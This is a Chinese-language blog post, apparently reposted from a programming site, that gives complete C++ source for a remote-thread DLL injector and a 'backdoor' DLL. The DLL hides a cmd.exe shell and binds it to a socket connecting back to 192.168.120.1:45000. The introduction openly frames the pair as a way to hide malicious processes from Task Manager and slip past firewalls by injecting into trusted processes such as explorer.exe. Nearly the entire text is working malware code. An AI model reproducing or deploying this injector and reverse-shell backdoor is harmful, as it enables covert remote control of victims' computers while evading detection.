2. 程式人生 > >安全之路 —— 藉助DLL進行遠端執行緒注入實現穿牆與隱藏程序

安全之路 —— 藉助DLL進行遠端執行緒注入實現穿牆與隱藏程序

阿新 發佈:2019-02-18

簡介

       大多數後門或病毒要想初步實現隱藏程序,即不被像工作管理員這樣典型的RING3級程序管理器找到過於明顯的不明程序,其中比較著名的方法就是通過遠端執行緒注入的方法注入將惡意程序的DLL檔案注入系統認可的正常程序,你會發現工作管理員以及找不到獨立出現的惡意程序項了。反向連線型後門採用這種技術,注入防火牆認可的程序(例如大部分系統程序,像explorer.exe就很常見)還能夠獲得一定的穿牆效果。
        程序注入雖然已經是將近10年前的技術了,但是今天出現的很多新型黑客技術大多數還是基於這類老技術演變而來的。

C++程式碼樣例

1.程序注入工具原始碼:

//////////////////////////////////////
//
// FileName : injectDll.cpp
// Creator : PeterZ1997
// Date : 2018-5-15 23:58
// Comment : DLL inject module
//
//////////////////////////////////////

#pragma once
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <windows.h>
#include <tlhelp32.h>

using namespace std;

#define MAX_COUNT 255
 


/**
 * @brief 提高程序許可權
 * @param name   許可權名
 */
BOOL EnableDebugPriv(LPCSTR name)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tp;
    // 開啟程序令牌
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        printf("[!]Get Process Token Error!\n"
 
);
        return false;
    }
    // 獲取許可權Luid
    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        printf("[!]Get Privilege Error!\n");
        return false;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // 修改程序許可權
    if (!AdjustTokenPrivileges(hToken, false, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        printf("[!]Adjust Privilege Error!\n");
        return false;
    }
    return true;
}

/**
 * @brief 程序注入函式
 * @param pid            程序id
 * @param dllFileName    DLL檔案的完整路徑
 */
BOOL InjectDllProc(DWORD pid, LPCTSTR dllFileName)
{
    HANDLE hRemoteProcess;
    CHAR *pszDllSpace;
    if (!EnableDebugPriv(SE_DEBUG_NAME))
    {
        return false;
    }
    if ((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == NULL)
    {
        printf("[!]Open Target Process Error!\n");
        return false;
    }
    if ((pszDllSpace = (CHAR*)VirtualAllocEx(hRemoteProcess, NULL, strlen(dllFileName) + 1, MEM_COMMIT, PAGE_READWRITE)) == NULL)
    {
        printf("[!]Alloc Space Error!\n");
        return false;
    }
    if (WriteProcessMemory(hRemoteProcess, pszDllSpace, (LPVOID)dllFileName, strlen(dllFileName) + 1, NULL) == 0)
    {
        printf("[!]Write to the Memory Error!\n");
        return false;
    }
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
    if (pfnStartAddr == NULL)
    {
        printf("[!]Get <LoadLibrary> Function Error!\n");
        return false;
    }
    HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszDllSpace, 0, NULL);
    if (hRemoteThread == NULL)
    {
        printf("[!]Create Remote Thread Error!\n");
        return false;
    }
    return true;
}

/**
 * @brief 獲取程序id
 * @param procName  程序名
 */
DWORD GetProcPid(LPCSTR procName)
{
    DWORD pid = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcSnap == INVALID_HANDLE_VALUE)
    {
        printf("[!]Can not Create Process Snap !\n");
        return -1;
    }
    BOOL bProc = Process32First(hProcSnap, &pe32);
    while (bProc)
    {
        if (!stricmp(procName, pe32.szExeFile))
        {
            return pe32.th32ProcessID;
        }
        bProc = Process32Next(hProcSnap, &pe32);
    }
    CloseHandle(hProcSnap);
    return pid;
}

/**
 * @brief 主函式
 */
int main(int argc, char* argv[])
{
    CHAR dllPath[MAX_COUNT] = "\0";
    WIN32_FIND_DATA wfd;
    if (argc != 3)
    {
        printf("[*Usage*] injectDll.exe <Process Name> <Dll Name>\n");
        return 0;
    }
    GetCurrentDirectory(sizeof(dllPath), dllPath);
    StringCchCat(dllPath, sizeof(dllPath), "\\");
    StringCchCat(dllPath, sizeof(dllPath), argv[2]);
    if (FindFirstFile(argv[2], &wfd) == INVALID_HANDLE_VALUE)
    {
        printf("[!] Can not Find Dll File !\n");
        return 0;
    }
    DWORD pid = GetProcPid(argv[1]);
    if (pid != -1)
    {
        if (!InjectDllProc(pid, dllPath))
        {
            printf("[!]Inject Dll Error!\n");
            return 0;
        }
        printf("[*]Inject Dll Success!\n");
    }
    else
    {
        printf("[*]Inject Dll Error!\n");
        return 0;
    }
    return 0;
}

2.Dll檔案樣例原始碼:

/////////////////////////////////////////////
//
// FileName : BackDoorDLL.cpp
// Creator : PeterZ1997
// Date : 2018-5-11 00:10
// Comment : 零管道後門DLL
//
////////////////////////////////////////////

#pragma once
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <WinSock2.h>
#include <windows.h>

#pragma comment(lib, "ws2_32")

using namespace std;

#define MAX_COUNT 255

/**
 * @brief 啟動Cmd程序,與socket例項通訊
 * @param lpParameter    多執行緒函式引數,此為傳入socket例項
 */
DWORD WINAPI StartShellProc(LPVOID lpParameter)
{
    CHAR cmdLine[MAX_COUNT] = "\0";
    SOCKET sServer = (SOCKET)lpParameter;
    STARTUPINFO si;
    GetStartupInfo(&si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sServer;
    GetSystemDirectory(cmdLine, sizeof(cmdLine));
    StringCchCat(cmdLine, sizeof(cmdLine), "\\cmd.exe");
    PROCESS_INFORMATION pi;
    CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &si, &pi);
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    return 0;
}

/**
 * @brief socket建立函式
 * @param lpParameter    多執行緒函式引數,這裡傳入NULL
 */
DWORD WINAPI BackDoorThread(LPVOID lpParameter)
{
    CHAR szMessage[MAX_COUNT] = "===========> Hello,Admin <=============\n";
    WSADATA wsd;
    SOCKET sServer;
    sockaddr_in sin;
    if (WSAStartup(0x0202, &wsd)) return 0;
    if ((sServer = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) == INVALID_SOCKET)
    {
        return 0;
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(45000);
    sin.sin_addr.S_un.S_addr = inet_addr("192.168.120.1");
    if (connect(sServer, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        return 0;
    }
    if (send(sServer, szMessage, strlen(szMessage), 0) == SOCKET_ERROR)
    {
        return 0;
    }
    HANDLE hThread = CreateThread(NULL, 0, StartShellProc, (LPVOID)sServer, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

/**
 * @brief DLL檔案主函式
 */
BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD     fdwReason,
    _In_ LPVOID    lpvReserved
)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, 0, BackDoorThread, NULL, 0, NULL);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return true;
}

相關推薦

安全 —— 藉助DLL進行遠端執行注入實現穿隱藏程序

簡介        大多數後門或病毒要想初步實現隱藏程序,即不被像工作管理員這樣典型的RING3級程序管理器找到過於明顯的不明程序,其中比較著名的方法就是通過遠端執行緒注入的方法注入將惡意程序的DLL檔案注入系統認可的正常程序,你會發現工作管理員以及找不

MFC hook注入dll遠端執行注入dll

[cpp] view plain copy  print? #include "stdafx.h" #include <atlstr.h> //很

安全 —— 無DLL檔案實現遠端程序注入

簡介         在之前的章節中,筆者曾介紹過有關於遠端執行緒注入的知識,將後門.dll檔案注入explorer.exe中實現繞過防火牆反彈後門。但一個.exe檔案總要在注入時捎上一個.dll檔案著實是怪麻煩的,那麼有沒有什麼方法能夠不適用.dll檔案實現

安全 —— 利用遠程線程註入的方法(使用DLL實現穿隱藏進程

pat 完整路徑 ystemd return cpi printf output inf server 簡介 大多數後門或病毒要想初步實現隱藏進程,即不被像任務管理器這樣典型的RING3級進程管理器找到過於明顯的不明進程,其中比較著名的方法就是通過遠程線程註

安全 —— 無DLL文件實現遠程線程註入

資源管理 dir 簡介 sdn wsize date process 地址 str 簡介 在之前的章節中,筆者曾介紹過有關於遠程線程註入的知識,將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.d

奇技淫巧除錯被遠端執行注入DLL

遠端執行緒注入, 這東西大家都懂的, 一般都被大家用來幹些小小的壞事情,比如API Hook~~將DLL注入到其它程序並不是難事,問題是這個被注入的DLL不太好除錯,除錯DLL本來就是個比較頭疼的問題,更何況是這種執行在其它程序空間的DLL, 被注入DLL的程式,不崩潰還好

遠端執行注入RemoteThread(dll)

// RemoteInject.h #pragma once // RemoteInject 對話方塊 class RemoteInject : public CDialogEx { DECLARE_DYNAMIC(RemoteInject) public: RemoteInject(

非同步程式設計學習(三)-多執行之間的協作通訊

本文是非同步程式設計學習之路(三)-多執行緒之間的協作與通訊,若要關注前文,請點選傳送門: 非同步程式設計學習之路(二)-通過Synchronize實現執行緒安全的多執行緒 通過前文,我們學習到如何實現同步的多執行緒,但是在很多情況下,僅僅同步是不夠的,還需要執行緒與執行緒協作(通訊),生產

建立遠端執行注入Dll——CreateRemoteThread

CreateRemoteThread是建立一個在其他程序的地址空間中執行的執行緒(也稱遠端執行緒)。其函式原型為:HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess, __in LPSECURITY_ATTRIBUTE

詳細解讀:遠端執行注入DLL到PC版微信

一、遠端執行緒注入的原理   1、其基礎是在 Windows 系統中,每個 .exe 檔案在雙擊開啟時都會載入 kernel32.dll 這個系統模組,該模組中有一個 LoadLibrary() 函式,可以將DLL檔案載入到自身程序中。   2、這樣,就可以用 CreateRemoteThrea

遠端執行注入

在win32程序中,每個程序都有自己獨立的4GB地址空間,各個程序之間相互不影響,win32API中提供能夠了2個函式,writeProcessMemory和readProcessMemory,這兩個函式可以在指定程序的記憶體中進行讀寫操作。 HANDLE CreateRemoteThrea

遠端執行注入並呼叫API

win7 的GetProAddress地址會變動,所以該程式碼不適用於win7 // 遠端執行緒注入_呼叫API.cpp : 定義控制檯應用程式的入口點。 // #include "stdafx.h" #include "windows.h" typedef int

18遠端執行注入

上篇我們練習了使用CreateRemoteThread函式來建立遠端執行緒,但是執行的程式碼塊仍然是原程式中的程式碼,那麼如何讓原程式執行我們自己自己的程式碼呢? 這裡我們就需要注入的技術,那什麼是注入呢? 所謂注入就是指在第三方程序不知道或者不允許的情況下,將我們的模組和程式碼寫入其程序空

以前寫的兩本書《安全:Web滲透技術及實戰案例解析(第2版)》和《黑客攻防實戰加密解密》

Web滲透技術及實戰案例解析 黑客攻防實戰加密與解密 應一些朋友的要求,我重新將書封面和購買地址發一下說明一下:www.antian365.com原來域名轉移到國外去了。現在國家對境外域名在國內訪問必須實名制,進行備份啥的,情況你懂的。最近正在制作《黑客攻防實戰加密與解密》的視頻課程,對黑客攻防過程遇

安全 —— 利用端口復用技術隱藏後門端口

mil *** zcm 一位 標識 creator process count handle 簡介 前面我們介紹到我們可以用進程註入的方法,借用其他應用的端口收發信息,從而達到穿墻的效果,那麽今天介紹一種新的方法,叫做端口復用技術,他能夠與其他應用綁定同一個端口,但同時進

安全 —— C/C++實現後門的服務自啟動

net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動,映像劫持技術,SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種

安全 —— 利用SVCHost.exe系統服務實現後門自啟動

cas default wait cal tis lis success 放置 簡介 簡介 在Windows系統中有一個系統服務控制器,叫做SVCHost.exe,它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服

安全 —— C++實現進程守護

之前 aps serve query value isa process read subst 簡介 所謂進程守護,就是A進程為了保護自己不被結束,創建了一個守護線程來保護自己,一旦被結束進程,便重新啟動。進程守護的方法多被應用於惡意軟件,是一個保護自己進程的一個簡單方式

muduo當解構函式遇見執行安全

一、當解構函式遇到多執行緒 當一個物件能被多個執行緒同時看到時,那麼物件的銷燬時機就會變得模糊不清,可能出現多種競態條件: ① 在即將析構一個物件時,如何知道此時是否有別的執行緒正在執行該物件的成員函式? ② 如何保證在執行成員函式期間,物件不會被另一個執行緒析構? ③ 在呼叫某個物

Linux學習:第二章配置網路IP,實現遠端連線(上)

備註:屬於個人分享,文章如有問題請留言,謝謝! 第二章配置網路IP,實現遠端連線 1、輸入使用者和密碼 輸入密碼的時候是不會顯示的 如何檢視Linux系統是32位還是64位,X86是32位,X86_64是64位                  命令: unam